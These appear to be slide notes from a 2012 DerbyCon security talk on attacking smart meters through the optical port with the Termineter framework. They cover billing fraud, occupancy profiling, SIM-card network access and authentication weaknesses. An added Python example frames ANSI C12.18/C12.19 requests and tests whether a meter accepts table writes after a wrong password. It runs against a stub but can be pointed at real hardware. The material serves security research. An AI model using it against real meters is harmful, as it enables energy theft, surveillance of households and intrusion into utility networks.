The document discusses attacking smart meters. It provides background on smart meter infrastructure (AMI) and explains why attackers target smart meters, for the information they hold and for the access they provide. It then demonstrates how to access meters over the wired optical interface, using an ANSI Type-2 optical probe and the open source Termineter framework, which implements the ANSI C12.18 protocol and the C12.19 table formats to read and write meter data tables. A demo of Termineter is shown, and future work such as Zigbee integration is discussed.
1. How I Learned To Stop Worrying and Love the Smart Meter
September 30th, 2012
DerbyCon 2.0
Spencer McIntyre
2. About Your Presenter
- Spencer McIntyre
- Security Consultant on SecureState's Research and Innovation team
- Background/Specialization
  - Tool development
  - "Special Projects"
4. Background
- What is AMI?
- AMI (Advanced Metering Infrastructure)
  - The infrastructure to communicate with gas, water and electric meters
  - Allows two-way communication with the meter
    - Compared to AMR (Automatic Meter Reading), which only allows one-way communication
  - A component of a smart grid
  - Allows automatic, remote readings and configuration
- Today, we're focusing on the meter component
5. Background
- The old days of stealing power with magnets are ending
- USA Today estimates $6 billion in power is stolen each year
- AMI is still being deployed in many locations
6. Why Attack Smart Meters?
- The same two reasons we typically attack anything
  - Information
    - Control of information
  - Access
- Consumers have physical access to the meter
- Smart meters are growing in popularity
7. Information
- Meters store usage information
- That information can be modified to affect billing
  - Modification results in fraud
- Usage can be profiled
  - Electric meters are the best bet
  - Peak usage can identify when occupants are home or a building is in use
8. Access
- Some meters can reach the service provider's internal network via a cellular connection
  - Not the case when a central collector unit is used to gather data
- The meter has a SIM card
  - Requires the typical SIM card settings (APN, username, password, etc.)
  - Either direct internet access or private network access
9. Case Study
- An attacker with physical access can open the meter and retrieve the SIM card
- Guess/brute-force the settings
  - APN
  - Username (if set)
  - Password (if set)
- Result: internal network access
10. Accessing Meters
- At a basic level, there are two mechanisms
  - Wireless
    - Zigbee
    - Cellular
  - Wired (we're only covering this one)
    - Optical interface
11. Wired Access
- Meters can be accessed using a physical connection
  - ANSI Type-2 Optical Probe (sounds dirty)
- A couple of standards are in use here
  - ANSI C12.18
    - Defines the protocol for accessing data over the optical port (requests/responses)
  - ANSI C12.19
    - Defines the data formats (the tables) that are read and written
12. C12.19 Background
- Tables are broken up into "decades" based on their IDs
  - General Configuration: 0-9
  - Security Tables: 40-49
    - Define access permissions
  - History and Event Logs: 70-79
  - Telephone/Modem Control: 90-99
  - About 10 more decades are defined by the C12.19-2008 standard
13. Physical Equipment
- Optical probes are expensive (~$500)
- Can they be built for cheaper?
  - Use infrared transceivers
14. Introduction: Termineter
- The "Termineter" framework provides access to meters over C12.18
- Modeled after the Metasploit Framework for ease of use
- Implemented in Python
- Includes a full C12.18 stack and a C12.19 library
- Released last week
- Open source: http://code.google.com/p/termineter
15. Termineter: Features
- Currently interacts with meters via a serial connection (the optical probe)
- Core features are implemented as modules
  - 12 modules in total
- Modules mostly focus on reading from and writing to C12.19 tables
- Everything involves reading/writing tables
  - Even running "procedures" (a procedure is started by writing to standard table 7 and its result is read back from table 8)
16. Termineter: Modules
- Included modules:
  - Basic information retrieval
  - Brute forcing authentication
  - Reading/writing tables (low-level)
17. Termineter: Modules
- Modules require some knowledge (not quite script-kiddie ready)
  - Mostly knowledge of what valid data to write to a table looks like
  - Procedures can be tricky; check the documentation
- Some modules automate common tasks
  - Changing the meter's ID
  - Setting the meter's operating mode
18. Terminating with Termineter
- Common security issues
  - Some table values can be modified without proper authentication (the write is accepted even after an invalid password was supplied)
  - Some meters ignore the username and user ID fields when authenticating users
  - No lock-out, only logging of failed attempts
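The following is an added worked example for slides 11, 12 and 18, written for this page; it is not Termineter code. It frames C12.18 requests the way they travel over the optical port (start byte 0xEE, identity, control, sequence number, two-byte length, data, and the HDLC-style CRC that C12.18 uses, sent low byte first), wraps table data in the C12.19 count/data/checksum layout, and then runs the slide-18 check: log on with an arbitrary user, present a wrong password, and see whether a table write is still accepted. `StubMeter` is a constructed stand-in so the code runs offline; its `weak` flag models the behaviour the slide describes and says nothing about any particular meter. Space padding of the 10-byte user field and NUL padding of the 20-byte password are assumptions.

```python
"""ANSI C12.18 framing, C12.19 table read/write, and an unauthenticated-write
check. Added example, not Termineter code; StubMeter is a constructed stand-in."""
import struct

STP = 0xEE                                   # C12.18 start-of-packet byte
REQ = {'ident': 0x20, 'read': 0x30, 'write': 0x40, 'logon': 0x50, 'security': 0x51}
RESP = {0x00: 'ok', 0x01: 'err', 0x02: 'sns', 0x03: 'isc', 0x04: 'onp', 0x05: 'iar',
        0x06: 'bsy', 0x07: 'dnr', 0x08: 'dlk', 0x09: 'rno', 0x0A: 'isss'}

def crc16(data: bytes) -> int:
    """HDLC CRC as used by C12.18: poly 0x1021 reflected, init and xorout 0xFFFF."""
    crc = 0xFFFF
    for b in data:
        crc ^= b
        for _ in range(8):
            crc = (crc >> 1) ^ 0x8408 if crc & 1 else crc >> 1
    return crc ^ 0xFFFF

def frame(body: bytes, identity: int = 0, ctrl: int = 0, seq: int = 0) -> bytes:
    """<stp> <identity> <ctrl> <seq-nbr> <length:2 BE> <data> <crc:2 LE>."""
    hdr = struct.pack('>BBBBH', STP, identity, ctrl, seq, len(body))
    return hdr + body + struct.pack('<H', crc16(hdr + body))

def unframe(pkt: bytes) -> bytes:
    """Check start byte, length and CRC, then return the <data> field."""
    if len(pkt) < 8 or pkt[0] != STP:
        raise ValueError('bad start byte or short packet')
    (length,) = struct.unpack('>H', pkt[4:6])
    end = 6 + length
    if len(pkt) != end + 2:
        raise ValueError('length field does not match packet size')
    if struct.unpack('<H', pkt[end:])[0] != crc16(pkt[:end]):
        raise ValueError('bad CRC')
    return pkt[6:end]

def table_data(data: bytes) -> bytes:
    """<count:2 BE> <data> <cksum>; cksum is the 2's complement of the byte sum."""
    return struct.pack('>H', len(data)) + data + bytes([(-sum(data)) & 0xFF])

def parse_table_data(body: bytes) -> bytes:
    (count,) = struct.unpack('>H', body[:2])
    data = body[2:2 + count]
    if (sum(data) + body[2 + count]) & 0xFF:
        raise ValueError('bad table checksum')
    return data

def read_req(table_id: int) -> bytes:
    return bytes([REQ['read']]) + struct.pack('>H', table_id)

def write_req(table_id: int, data: bytes) -> bytes:
    return bytes([REQ['write']]) + struct.pack('>H', table_id) + table_data(data)

def logon_req(user_id: int = 0, user: bytes = b'') -> bytes:
    # 2-byte user-id and 10-byte user field; space padding is an assumption
    return bytes([REQ['logon']]) + struct.pack('>H', user_id) + user.ljust(10, b' ')[:10]

def security_req(password: bytes) -> bytes:
    # 20-byte password field; NUL padding is an assumption
    return bytes([REQ['security']]) + password.ljust(20, b'\x00')[:20]

class StubMeter:
    """Constructed stand-in for an offline run. weak=True models the slide-18
    behaviour (writes accepted after a failed security request); not a real meter."""
    def __init__(self, password: bytes, weak: bool = False):
        self.password, self.weak = password.ljust(20, b'\x00'), weak
        self.tables, self.authed, self.failed = {1: b'ACME 1234'}, False, 0

    def exchange(self, pkt: bytes) -> bytes:
        req = unframe(pkt)
        if req[0] == REQ['logon']:                         # user/user-id not checked
            resp = b'\x00'
        elif req[0] == REQ['security']:
            self.authed = req[1:21] == self.password
            self.failed += 0 if self.authed else 1           # logged, never locked out
            resp = b'\x00' if self.authed else b'\x03'
        elif req[0] == REQ['read']:
            (tid,) = struct.unpack('>H', req[1:3])
            resp = b'\x00' + table_data(self.tables[tid]) if tid in self.tables else b'\x04'
        elif req[0] == REQ['write']:
            (tid,) = struct.unpack('>H', req[1:3])
            if self.authed or self.weak:
                self.tables[tid] = parse_table_data(req[3:])
                resp = b'\x00'
            else:
                resp = b'\x03'                                # isc: insufficient security
        else:
            resp = b'\x02'                                    # sns: service not supported
        return frame(resp)

def check_unauth_write(meter, table_id: int, data: bytes) -> str:
    """Log on with an arbitrary user, present a wrong password, then attempt a write.
    Returns the C12.18 response name; 'ok' is the issue described on slide 18."""
    meter.exchange(frame(logon_req(0, b'audit')))
    meter.exchange(frame(security_req(b'not-the-password')))
    code = unframe(meter.exchange(frame(write_req(table_id, data))))[0]
    return RESP.get(code, hex(code))
```

A useful sanity check on the framing is the identification request: `frame(b'\x20')` produces `EE 00 00 00 00 01 20 13 10`, which can be compared against a capture from a real probe. To run the check against real hardware, replace `StubMeter.exchange` with a function that writes the framed bytes to the probe's serial port and reads the reply; a real link also needs the ACK (0x06) / NAK (0x15) bytes and the toggle bit in the control field, which are left out here to keep the example short.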
20. Termineter Future
- Getting this far has been a fight
- Future plans include
  - Zigbee integration
  - Support for character sets beyond 7-bit
  - Additional modules
    - Easier access to procedures
23. Thank you for your time!
Spencer McIntyre
Email: SMcIntyre@SecureState.net
Twitter: @zeroSteiner
Termineter Homepage: http://code.google.com/p/termineter
Questions & Answers